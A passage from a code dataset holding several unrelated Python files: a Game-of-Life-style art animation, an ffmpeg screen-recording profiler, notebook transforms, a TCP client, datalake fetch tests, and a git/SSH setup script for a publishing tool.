u.colOverlay.complete == True:\n\t\t\tneighbours = u.getNeighbours()\n\t\t\tu.colOverlay.colorTransitionSetup()\n\t\t\tfor unit in neighbours:\n\t\t\t\tcol = unit[0]\n\t\t\t\trow = unit[1]\n\t\t\t\tif col >= 0 and col < config.cols and row >= 0 and row < config.rows:\n\t\t\t\t\ttargetUnit = config.gridArray[col][row]\n\t\t\t\t\tif random.random() <= config.propagationProbability:\n\t\t\t\t\t\tif (\n\t\t\t\t\t\t\ttargetUnit.colOverlay.getPercentageDone()\n\t\t\t\t\t\t\t> config.doneThreshold\n\t\t\t\t\t\t):\n\t\t\t\t\t\t\ttargetUnit.colOverlay.colorTransitionSetup(\n\t\t\t\t\t\t\t\tnewColor=u.colOverlay.colorB,\n\t\t\t\t\t\t\t\tsteps=round(u.colOverlay.steps / 3),\n\t\t\t\t\t\t\t)\n\n\tconfig.render(config.image, 0, 0)\n\n\ndef redrawGrid2():\n\n\tfor u in config.unitArray:\n\t\tu.bgColor = tuple(\n\t\t\tint(a * config.brightness) for a in (config.colOverlay.currentColor)\n\t\t)\n\t\tu.drawUnit()\n\t\tconfig.image.paste(u.image, (u.xPos + config.imageXOffset, u.yPos), u.image)\n\n\t\tneighbours = u.getNeighbours()\n\t\tu.colOverlay.colorTransitionSetup()\n\n\t\tscore = 0\n\n\t\t## Count how many live neighbors there are out of 8 unless at edge (5) or corner (3)\n\t\tfor unit in neighbours:\n\t\t\tcol = unit[0]\n\t\t\trow = unit[1]\n\t\t\tif col >= 0 and col < config.cols and row >= 0 and row < config.rows:\n\t\t\t\ttry:\n\t\t\t\t\ttargetUnit = config.gridArray[col][row]\n\n\t\t\t\t\tif targetUnit.score == 1:\n\t\t\t\t\t\tscore += 1\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(e, len(config.unitArray), unit, col, row)\n\n\t\t## If the cell is alive check if it's being overcrowded\n\t\t## or has too few neighbors to survive\n\t\tif u.score == 1:\n\t\t\tif score < config.underPopulationThreshold:\n\t\t\t\tu.score = 0\n\n\t\t\t## Should be > 3\n\t\t\tif score > config.overCrowdingThreshold:\n\t\t\t\tu.score = 0\n\n\t\t\t# if score > 1 and score < config.dieThreshold :\n\t\t\t# u.score = 1\n\n\t\tif u.score == 0:\n\t\t\tif score == config.liveThreshold:\n\t\t\t\tu.score = 1\n\n\t\tif u.score == 1:\n\t\t\tu.colOverlay.colorTransitionSetup(steps=round(u.colOverlay.steps / 3))\n\n\t\tif u.score == 0:\n\t\t\tu.colOverlay.colorTransitionSetup(newColor=(config.deadColor))\n\n\t\tif random.random() > config.propagationProbability:\n\t\t\tu.score = 1\n\n\tconfig.render(config.image, 0, 0)\n\n\tconfig.t2 = time.time()\n\tdelta = config.t2 - config.t1\n\n\tif delta > config.timeToComplete:\n\t\tsetUp()\n\n\n## Setup and run functions\ndef main(run=True):\n\tglobal config, directionOrder\n\tprint(\"---------------------\")\n\tprint(\"propagation Loaded\")\n\n\tcolorutils.brightness = config.brightness\n\tconfig.canvasImageWidth = config.screenWidth\n\tconfig.canvasImageHeight = config.screenHeight\n\tconfig.canvasImageWidth -= 4\n\tconfig.canvasImageHeight -= 4\n\tconfig.delay = float(workConfig.get(\"propagation\", \"redrawDelay\"))\n\n\tconfig.baseRotation = config.rotation\n\n\tconfig.fontColorVals = (workConfig.get(\"propagation\", \"fontColor\")).split(\",\")\n\tconfig.fontColor = tuple(\n\t\tmap(lambda x: int(int(x) * config.brightness), config.fontColorVals)\n\t)\n\tconfig.outlineColorVals = (workConfig.get(\"propagation\", \"outlineColor\")).split(\",\")\n\tconfig.outlineColor = tuple(\n\t\tmap(lambda x: int(int(x) * config.brightness), config.outlineColorVals)\n\t)\n\n\tconfig.coordinatedColorChange = False\n\tconfig.propagationProbability = float(\n\t\tworkConfig.get(\"propagation\", \"propagationProbability\")\n\t)\n\tconfig.doneThreshold = float(workConfig.get(\"propagation\", \"doneThreshold\"))\n\n\tconfig.overCrowdingThreshold = int(\n\t\tworkConfig.get(\"propagation\", \"overCrowdingThreshold\")\n\t)\n\tconfig.underPopulationThreshold = int(\n\t\tworkConfig.get(\"propagation\", \"underPopulationThreshold\")\n\t)\n\tconfig.liveThreshold = int(workConfig.get(\"propagation\", \"liveThreshold\"))\n\t# config.dieThreshold = int(workConfig.get(\"propagation\",\"dieThreshold\"))\n\n\tconfig.timeTrigger = workConfig.getboolean(\"propagation\", \"timeTrigger\")\n\tconfig.tLimitBase = int(workConfig.get(\"propagation\", \"tLimitBase\"))\n\tconfig.colOverlay = coloroverlay.ColorOverlay()\n\tconfig.colOverlay.randomSteps = False\n\tconfig.colOverlay.timeTrigger = False\n\tconfig.colOverlay.tLimitBase = config.tLimitBase\n\tconfig.colOverlay.maxBrightness = config.brightness\n\tconfig.unHideGrid = False\n\tconfig.colorStepsRangeMin = int(workConfig.get(\"propagation\", \"colorStepsRangeMin\"))\n\tconfig.colorStepsRangeMax = int(workConfig.get(\"propagation\", \"colorStepsRangeMax\"))\n\n\tconfig.rows = int(workConfig.get(\"propagation\", \"rows\"))\n\tconfig.cols = int(workConfig.get(\"propagation\", \"cols\"))\n\n\tdeadColor = (workConfig.get(\"propagation\", \"deadColor\")).split(\",\")\n\tconfig.deadColor = tuple(map(lambda x: float(x), deadColor))\n\n\ttry:\n\t\tconfig.randomRotation = workConfig.getboolean(\"propagation\", \"randomRotation\")\n\texcept Exception as e:\n\t\tprint(str(e))\n\t\tconfig.randomRotation = False\n\n\ttry:\n\t\tconfig.showText = workConfig.getboolean(\"propagation\", \"showText\")\n\texcept Exception as e:\n\t\tprint(str(e))\n\t\tconfig.showText = True\n\n\ttry:\n\t\tconfig.showOutline = workConfig.getboolean(\"propagation\", \"showOutline\")\n\texcept Exception as e:\n\t\tprint(str(e))\n\t\tconfig.showOutline = True\n\n\ttry:\n\t\tconfig.steps = int(workConfig.get(\"propagation\", \"steps\"))\n\texcept Exception as e:\n\t\tprint(str(e))\n\t\tconfig.steps = 200\n\n\ttry:\n\t\tconfig.useFixedPalette = workConfig.getboolean(\"propagation\", \"useFixedPalette\")\n\t\tconfig.paletteRange = int(workConfig.get(\"propagation\", \"paletteRange\"))\n\t\tconfig.palette = {}\n\t\tfor i in range(0, config.paletteRange):\n\t\t\tname = \"p\" + str(i + 1)\n\t\t\tvals = (workConfig.get(\"propagation\", name)).split(\",\")\n\t\t\tconfig.palette[name] = tuple(map(lambda x: float(x), vals))\n\t\t# print(config.palette['p1'])\n\t\tconfig.paletteDropHueMin = int(workConfig.get(\"propagation\", \"dropHueMin\"))\n\t\tconfig.paletteDropHueMax = int(workConfig.get(\"propagation\", \"dropHueMax\"))\n\n\texcept Exception as e:\n\t\tprint(str(e))\n\t\tconfig.useFixedPalette = False\n\n\tconfig.colOverlay.steps = config.steps\n\n\tconfig.tileSizeWidth = int(workConfig.get(\"propagation\", \"tileSizeWidth\"))\n\tconfig.tileSizeHeight = int(workConfig.get(\"propagation\", \"tileSizeHeight\"))\n\n\t\"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\"\n\n\tconfig.canvasImage = Image.new(\n\t\t\"RGBA\", (config.canvasImageWidth, config.canvasImageHeight)\n\t)\n\tconfig.fontSize = 14\n\tconfig.font = ImageFont.truetype(\n\t\tconfig.path + \"/assets/fonts/freefont/FreeSansBold.ttf\", config.fontSize\n\t)\n\n\tsetUp()\n\n\tif run:\n\t\trunWork()\n\n\ndef setUp():\n\tglobal config\n\n\tmakeGrid()\n\n\ndef runWork():\n\tglobal blocks, config, XOs\n\t# gc.enable()\n\twhile True:\n\t\titerate()\n\t\ttime.sleep(config.delay)\n\n\ndef iterate():\n\n\tglobal config\n\tredrawGrid2()\n\n\n\"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\n", "sub_path": "pieces/singletons/propagation.py", "file_name": "propagation.py", "file_ext": "py", "file_size_in_byte": 11719, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "PIL.Image.new", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 33, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 34, "usage_type": "name"}, {"api_name": "modules.coloroverlay.ColorOverlay", "line_number": 37, "usage_type": "call"}, {"api_name": "modules.coloroverlay", "line_number": 37, "usage_type": "name"}, {"api_name": "time.time", "line_number": 145, "usage_type": "call"}, {"api_name": "time.time", "line_number": 146, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 147, "usage_type": "call"}, {"api_name": "random.random", "line_number": 208, "usage_type": "call"}, {"api_name": "random.random", "line_number": 271, "usage_type": "call"}, {"api_name": "time.time", "line_number": 276, "usage_type": "call"}, {"api_name": "modules.colorutils.brightness", "line_number": 289, "usage_type": "attribute"}, {"api_name": "modules.colorutils", "line_number": 289, "usage_type": "name"}, {"api_name": "modules.coloroverlay.ColorOverlay", "line_number": 324, "usage_type": "call"}, {"api_name": "modules.coloroverlay", "line_number": 324, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 386, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 386, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 390, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 390, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 411, "usage_type": "call"}]}
+{"seq_id": "338142588", "text": "import os\r\nimport time\r\nimport platform\r\nimport subprocess\r\nfrom ..common.recordscreen import video_capture_line\r\nfrom ..common.recordscreen import get_mac_os_display_channel\r\nfrom base import BaseProfiler\r\n\r\n\r\nclass AvconvProfiler(BaseProfiler):\r\n\r\n process = None\r\n fh = None\r\n t1_time = None\r\n\r\n def start_recording(self):\r\n if os.path.exists(self.env.video_output_fp):\r\n os.remove(self.env.video_output_fp)\r\n\r\n if platform.system().lower() == \"windows\":\r\n with open(self.env.recording_log_fp, 'w') as self.fh:\r\n self.process = subprocess.Popen(\"ffmpeg -f gdigrab -draw_mouse 0 -framerate \" + str(self.env.DEFAULT_VIDEO_RECORDING_FPS) + \" -video_size 1024*768 -i desktop -c:v libx264 -r \" + str(self.env.DEFAULT_VIDEO_RECORDING_FPS) + \" -preset veryfast -g 15 -crf 0 \" + self.env.video_output_fp, bufsize=-1, stdout=self.fh, stderr=self.fh)\r\n else:\r\n vline = video_capture_line(self.env.DEFAULT_VIDEO_RECORDING_FPS, self.env.DEFAULT_VIDEO_RECORDING_POS_X,\r\n self.env.DEFAULT_VIDEO_RECORDING_POS_Y,\r\n self.env.DEFAULT_VIDEO_RECORDING_WIDTH, self.env.DEFAULT_VIDEO_RECORDING_HEIGHT,\r\n get_mac_os_display_channel(),\r\n self.env.DEFAULT_VIDEO_RECORDING_CODEC, self.env.video_output_fp)\r\n self.process = subprocess.Popen(vline, bufsize=-1, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n\r\n for counter in range(10):\r\n if os.path.exists(self.env.video_output_fp):\r\n self.t1_time = time.time()\r\n break\r\n else:\r\n time.sleep(0.3)\r\n\r\n def stop_recording(self, **kwargs):\r\n if platform.system().lower() == \"windows\":\r\n subprocess.Popen(\"taskkill /IM ffmpeg.exe /T /F\", shell=True) \r\n else:\r\n self.process.send_signal(3)\r\n out, err = self.process.communicate()\r\n with open(self.env.recording_log_fp, 'w') as self.fh:\r\n self.fh.write(err)\r\n self.fh.close()\r\n", "sub_path": "lib/profiler/avconvProfiler.py", "file_name": "avconvProfiler.py", "file_ext": "py", "file_size_in_byte": 2150, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "base.BaseProfiler", "line_number": 10, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 18, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 20, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 22, "usage_type": "call"}, {"api_name": "common.recordscreen.video_capture_line", "line_number": 24, "usage_type": "call"}, {"api_name": "common.recordscreen.get_mac_os_display_channel", "line_number": 27, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 29, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 33, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 39, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 40, "usage_type": "call"}]}
+{"seq_id": "503998134", "text": "\"\"\"Transformations to apply to a submission before execution\"\"\"\n\nimport copy\nimport nbformat\n\n\nIGNORE_CELL_TAG = \"otter_ignore\"\nCELL_METADATA_KEY = \"otter\"\n\n\ndef script_to_notebook(script):\n \"\"\"\n Convert a Python script (a string) to a notebook with ``nbformat``.\n\n Args:\n script (``str``): the script\n\n Returns:\n ``nbformat.NotebookNode``: a notebook with a single code cell containing the script\n \"\"\"\n nb = nbformat.v4.new_notebook()\n nb.cells.append(nbformat.v4.new_code_cell(script))\n return nb\n\n\ndef filter_ignored_cells(nb):\n \"\"\"\n Filter out all cells in the notebook ``nb`` that are tagged with ``otter_ignore`` or have the\n ``ignore`` key of their Otter cell metadata set to true.\n\n Args:\n nb (``nbformat.NotebookNode``): the notebook\n\n Returns:\n ``nbformat.NotebookNode``: the notebook with ignored cells removed\n \"\"\"\n nb = copy.deepcopy(nb)\n\n to_delete = []\n for i, cell in enumerate(nb[\"cells\"]):\n metadata = cell.get(\"metadata\", {})\n tags = metadata.get(\"tags\", [])\n\n if IGNORE_CELL_TAG in tags or metadata.get(CELL_METADATA_KEY, {}).get(\"ignore\", False):\n to_delete.append(i)\n\n to_delete.reverse()\n for i in to_delete:\n del nb[\"cells\"][i]\n\n return nb\n\n\ndef create_collected_check_cell(cell, check_results_list_name, notebook_class_name, test_dir):\n \"\"\"\n Generate a string of calls to ``otter.Notebook.check`` collecting the results in a list called\n ``check_results_list_name`` based on the cell metadata.\n\n Note that this string is formatted with surrounding newlines, so it can be inserted into any\n Python script as-is.\n\n Args:\n cell (``nbformat.NotebookNode``): the code cell to which checks should be appended\n check_results_list_name (``check_results_list_name``): the name of the list to append the \n results to\n notebook_class_name(``str``): the name of the ``otter.Notebook`` class in the environment\n test_dir (``str``): the path to the directory of tests. \n\n Returns:\n ``str``: the code to run the checks; if no checks are indicated, the empty string\n \"\"\"\n source = \"\"\n otter_config = cell.get(\"metadata\", {}).get(CELL_METADATA_KEY, {})\n\n if otter_config.get(\"tests\", []):\n tests = otter_config.get(\"tests\", [])\n for test in tests:\n source += f\"\\n{check_results_list_name}.append({notebook_class_name}(\" + \\\n f\"tests_dir='{test_dir}').check('{test}'))\\n\"\n\n return source\n", "sub_path": "otter/execute/transforms.py", "file_name": "transforms.py", "file_ext": "py", "file_size_in_byte": 2550, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "nbformat.v4.new_notebook", "line_number": 21, "usage_type": "call"}, {"api_name": "nbformat.v4", "line_number": 21, "usage_type": "attribute"}, {"api_name": "nbformat.v4.new_code_cell", "line_number": 22, "usage_type": "call"}, {"api_name": "nbformat.v4", "line_number": 22, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "389572617", "text": "#!/usr/bin/env python\n#coding:utf-8\nimport socket\nfrom gevent import monkey\nmonkey.patch_socket()\nimport gevent\nimport time\n\n\ndef StartClient(port):\n #链接服务端ip和端口\n c_port = ('127.0.0.1', 9999)\n s_port = ('127.0.0.1', port)\n #生成一个句柄\n sk = socket.socket()\n sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sk.bind(c_port)\n #请求连接服务端\n sk.connect(s_port)\n #发送数据\n sk.sendall(bytes('yaoyao', 'utf8'))\n #接受数据\n server_reply = sk.recv(1024)\n #打印接受的数据\n print(\n time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), \" \",\n str(server_reply, 'utf8'))\n\n # port reuse behavior, after socket.close then can reuse the port\n time.sleep(2)\n #关闭连接\n sk.close()\n\n\nif __name__ == '__main__':\n jobs = [gevent.spawn(StartClient(8001 + i)) for i in range(2)]\n gevent.joinall(jobs)\n", "sub_path": "workspace/py_test/tcpClient.py", "file_name": "tcpClient.py", "file_ext": "py", "file_size_in_byte": 932, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "gevent.monkey.patch_socket", "line_number": 5, "usage_type": "call"}, {"api_name": "gevent.monkey", "line_number": 5, "usage_type": "name"}, {"api_name": "socket.socket", "line_number": 15, "usage_type": "call"}, {"api_name": "socket.SOL_SOCKET", "line_number": 16, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 16, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 26, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 26, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 30, "usage_type": "call"}, {"api_name": "gevent.spawn", "line_number": 36, "usage_type": "call"}, {"api_name": "gevent.joinall", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "167631389", "text": "# Copyright 2016 Planet Labs, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n# use this file except in compliance with the License. You may obtain a copy of\n# the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations under\n# the License.\nimport pytest\nfrom datalake import InvalidDatalakePath\nimport os\nimport responses\n\n\ndef test_invalid_fetch_url(archive):\n with pytest.raises(InvalidDatalakePath):\n archive.fetch('x4t://foobar/bing')\n\n\ndef test_fetch_url_without_key(archive):\n with pytest.raises(InvalidDatalakePath):\n archive.fetch(archive.storage_url)\n\n\ndef test_key_does_not_exist(archive):\n url = archive.storage_url + '/nosuchfile'\n with pytest.raises(InvalidDatalakePath):\n archive.fetch(url)\n\n\ndef test_fetch(archive, datalake_url_maker, random_metadata):\n content = 'welcome to the jungle'.encode('utf-8')\n url = datalake_url_maker(metadata=random_metadata,\n content=content)\n f = archive.fetch(url)\n assert f.read() == content\n\n\ndef test_fetch_to_file(monkeypatch, archive, datalake_url_maker,\n random_metadata, tmpdir):\n monkeypatch.chdir(str(tmpdir))\n url = datalake_url_maker(metadata=random_metadata,\n content='now with more jingle')\n archive.fetch_to_filename(url)\n assert os.path.exists(random_metadata['id'])\n contents = open(random_metadata['id']).read()\n assert contents == 'now with more jingle'\n\n\ndef test_fetch_to_fancy_template(archive, datalake_url_maker, random_metadata,\n tmpdir):\n url = datalake_url_maker(metadata=random_metadata)\n t = os.path.join(str(tmpdir), '{where}/{what}/{start}-{id}-foobar.log')\n fname = '{}-{}-foobar.log'\n fname = fname.format(random_metadata['start'], random_metadata['id'])\n expected_path = os.path.join(str(tmpdir), random_metadata['where'],\n random_metadata['what'], fname)\n archive.fetch_to_filename(url, filename_template=t)\n assert os.path.exists(expected_path)\n\n\ndef test_no_such_metadata_field_in_template(archive, datalake_url_maker):\n url = datalake_url_maker()\n with pytest.raises(InvalidDatalakePath):\n archive.fetch_to_filename(url, filename_template='{nosuchmeta}')\n\n\ndef test_bad_template(archive, datalake_url_maker):\n url = datalake_url_maker()\n with pytest.raises(InvalidDatalakePath):\n archive.fetch_to_filename(url, filename_template='{bad')\n\n\ndef test_cli_fetch_to_file(monkeypatch, cli_tester, datalake_url_maker,\n random_metadata, tmpdir):\n monkeypatch.chdir(str(tmpdir))\n url = datalake_url_maker(metadata=random_metadata,\n content='look ma, CLI')\n\n cmd = 'fetch ' + url\n output = cli_tester(cmd)\n\n assert output == random_metadata['id'] + '\\n'\n assert os.path.exists(random_metadata['id'])\n contents = open(random_metadata['id']).read()\n assert contents == 'look ma, CLI'\n\n\n@responses.activate\ndef test_fetch_http_url(archive, random_metadata):\n base_url = 'http://datalake.example.com/v0/archive/files/1234/'\n content = 'foobar'.encode('utf-8')\n responses.add(responses.GET, base_url + 'data', body=content,\n content_type='text/plain', status=200)\n responses.add(responses.GET, base_url + 'metadata', json=random_metadata,\n content_type='application/json', status=200)\n f = archive.fetch(base_url + 'data')\n assert f.metadata == random_metadata\n assert f.read() == content\n\n\ndef test_invalid_url(archive, random_metadata):\n url = 'http://datalake.example.com/v0/archive/files/1234/'\n with pytest.raises(InvalidDatalakePath):\n archive.fetch(url)\n\n\ndef test_invalid_protocol(archive, random_metadata):\n url = 'ftp://alternate-datalake.example.com/v0/archive/files/1234/data'\n with pytest.raises(InvalidDatalakePath):\n archive.fetch(url)\n\n\n@responses.activate\ndef test_metadata_from_http_url(archive, random_metadata):\n url = 'http://datalake.example.com/v0/archive/files/1234data'\n content = 'foobody'.encode('utf-8')\n responses.add(responses.GET, url + '/data', body=content,\n content_type='text/plain', status=200)\n responses.add(responses.GET, url + '/metadata', json=random_metadata,\n content_type='application/json', status=200)\n f = archive.fetch(url + '/data')\n assert f.read() == content\n assert f.metadata == random_metadata\n", "sub_path": "test/test_fetch.py", "file_name": "test_fetch.py", "file_ext": "py", "file_size_in_byte": 4827, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pytest.raises", "line_number": 21, "usage_type": "call"}, {"api_name": "datalake.InvalidDatalakePath", "line_number": 21, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 26, "usage_type": "call"}, {"api_name": "datalake.InvalidDatalakePath", "line_number": 26, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 32, "usage_type": "call"}, {"api_name": "datalake.InvalidDatalakePath", "line_number": 32, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 69, "usage_type": "call"}, {"api_name": "datalake.InvalidDatalakePath", "line_number": 69, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 75, "usage_type": "call"}, {"api_name": "datalake.InvalidDatalakePath", "line_number": 75, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "responses.add", "line_number": 98, "usage_type": "call"}, {"api_name": "responses.GET", "line_number": 98, "usage_type": "attribute"}, {"api_name": "responses.add", "line_number": 100, "usage_type": "call"}, {"api_name": "responses.GET", "line_number": 100, "usage_type": "attribute"}, {"api_name": "responses.activate", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 109, "usage_type": "call"}, {"api_name": "datalake.InvalidDatalakePath", "line_number": 109, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 115, "usage_type": "call"}, {"api_name": "datalake.InvalidDatalakePath", "line_number": 115, "usage_type": "argument"}, {"api_name": "responses.add", "line_number": 123, "usage_type": "call"}, {"api_name": "responses.GET", "line_number": 123, "usage_type": "attribute"}, {"api_name": "responses.add", "line_number": 125, "usage_type": "call"}, {"api_name": "responses.GET", "line_number": 125, "usage_type": "attribute"}, {"api_name": "responses.activate", "line_number": 119, "usage_type": "attribute"}]}
+{"seq_id": "26378140", "text": "from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport getpass\nimport os\nimport shutil\nimport subprocess\nimport sys\n\nfrom Crypto.PublicKey import RSA\nimport publisher.settings as settings\nfrom publisher.exceptions import ValidationError\nfrom publisher.touchsurgery import TouchSurgery\nfrom publisher.utils import WorkingDirectory, get_command_output, get_input, get_platform, \\\n call_command_and_print_exception\n\n\ndef setup_users_machine():\n \"\"\"\n User Setup for publish\n 1. Check if git is installed\n 2. Setup SSH\n 3. Cloning the repo and git pull\n \"\"\"\n if not git_installed():\n win_msg = 'Please install Github for windows from https://desktop.github.com/ before coming back and ' \\\n 'continuing and running setup again.'\n mac_msg = 'Please install Git for Mac from https://git-scm.com/download/mac before running setup again.'\n\n print(\"%s\" % mac_msg if 'darwin' in get_platform() else win_msg)\n sys.exit(1)\n\n print('Generating key and configuring user profile')\n check_and_create_directory(settings.SSH_DIRECTORY_PATH)\n sys.stdout.flush()\n\n login_success = False\n get_username()\n while not login_success:\n if login(get_email(), get_password(), create_rsa_return_pub_key()):\n login_success = True\n\n print(\"Configuring ssh config file \")\n check_and_create_file(settings.SSH_CONFIG_PATH)\n if not has_private_key():\n raise RuntimeError(\"Unable to proceed without a key. Please contact Hansel before trying again\")\n configure_ssh_config()\n\n print(\"Installing and configuring git lfs\")\n check_brew_installed()\n install_git_lfs()\n configure_git_lfs()\n\n check_and_create_directory(settings.GIT_DIRECTORY)\n for repository, checkout_directory in get_repositories_to_checkout():\n clone_repo(repository, checkout_directory)\n pull_repo(checkout_directory)\n\n\ndef get_repositories_to_checkout():\n return [(settings.PROCEDURE_REPOSITORY, settings.PROCEDURE_CHECKOUT_DIRECTORY),\n (settings.CHANNELS_REPOSITORY, settings.CHANNELS_CHECKOUT_DIRECTORY),\n (settings.TRANSLATIONS_REPOSITORY, settings.TRANSLATIONS_CHECKOUT_DIRECTORY)]\n\n\ndef git_installed():\n try:\n subprocess.check_output(['git', '--version'])\n except OSError:\n print(\"Git not installed\")\n return False\n return True\n\n\ndef get_username(all_repos=True):\n print(\"Please enter your name here:\")\n sys.stdout.flush()\n username = get_input()\n if all_repos:\n subprocess.check_output(['git', 'config', '--global', 'user.name', username])\n else:\n subprocess.check_output(['git', 'config', 'user.name', username])\n\n\ndef get_email(all_repos=True):\n print(\"Please enter your touch surgery email here:\")\n sys.stdout.flush()\n email = get_input()\n if all_repos:\n subprocess.check_output(['git', 'config', '--global', 'user.email', email])\n else:\n subprocess.check_output(['git', 'config', 'user.email', email])\n return email\n\n\ndef get_password():\n print(\"Please enter your touch surgery password here:\")\n sys.stdout.flush()\n password = getpass.getpass()\n return password\n\n\ndef has_private_key():\n \"\"\"Check whether the user has the correct private key\n \"\"\"\n return os.path.exists(settings.RSA_PUBLIC_KEY_PATH)\n\n\ndef configure_ssh_config():\n \"\"\"Creates and sets up an ssh config file, or appends the necessary entry to an existing one\n \"\"\"\n shutil.copyfile(os.path.expanduser(settings.SSH_CONFIG_PATH), os.path.expanduser(settings.SSH_CONFIG_PATH + '.bak'))\n\n obsolete_stanza = (\n 'Host {0}\\n '\n 'User ubuntu\\n '\n 'IdentitiesOnly true\\n '\n 'IdentityFile ~/.ssh/touchsurgery-studio.pem\\n'\n ).format(settings.STUDIO_GIT_PATH)\n\n ssh_config_stanza = (\n 'Host {0}\\n'\n ' StrictHostKeyChecking no\\n'\n ' User git\\n'\n ' IdentitiesOnly true\\n'\n ' IdentityFile {1}\\n'\n ).format(settings.STUDIO_GIT_PATH, settings.RSA_PRIVATE_KEY_PATH)\n\n try:\n\n with open(os.path.expanduser(settings.SSH_CONFIG_PATH), \"r\") as config_file:\n current_config_text = config_file.read()\n ssh_config_missing = ssh_config_stanza not in current_config_text\n obsolete_stanza_present = obsolete_stanza in current_config_text\n\n # Remove outdated config info\n if obsolete_stanza_present:\n current_config_text = current_config_text.replace(obsolete_stanza, '')\n with open(os.path.expanduser(settings.SSH_CONFIG_PATH), \"w\") as config_file:\n config_file.write(current_config_text)\n\n # Add relevant config info\n if ssh_config_missing:\n with open(os.path.expanduser(settings.SSH_CONFIG_PATH), \"a+\") as config_file:\n config_file.write('\\n' + '\\n' + ssh_config_stanza)\n\n except Exception:\n print(\"Unable to configure the ssh config\")\n raise\n\n\ndef check_brew_installed():\n \"\"\" Get Macs ready to brew\n \"\"\"\n if 'darwin' in get_platform():\n output, _ = get_command_output(['brew', 'help'])\n if 'usage' not in output.lower():\n raise Exception(\"Please install Brew from here: https://brew.sh/\")\n\n\ndef install_git_lfs():\n \"\"\"Install git lfs\n \"\"\"\n if 'darwin' in get_platform():\n output, _ = get_command_output(['which', 'git-lfs'])\n if 'usr' not in output.lower():\n call_command_and_print_exception(['brew', 'install', 'git-lfs'], \"brew lfs install failure\")\n\n call_command_and_print_exception(['git', 'lfs', 'install'], \"lfs install failure\")\n\n\ndef clone_repo(repository, directory):\n if not os.path.exists(directory):\n call_command_and_print_exception(['git', 'lfs', 'clone', repository, directory], \"Clone repo failure\")\n else:\n print(\"Not cloning repository: {0} already exists\".format(directory))\n\n\ndef pull_repo(directory):\n with WorkingDirectory(directory):\n call_command_and_print_exception(['git', 'lfs', 'pull', 'origin', 'master'], \"Git pull failure\")\n\n\ndef 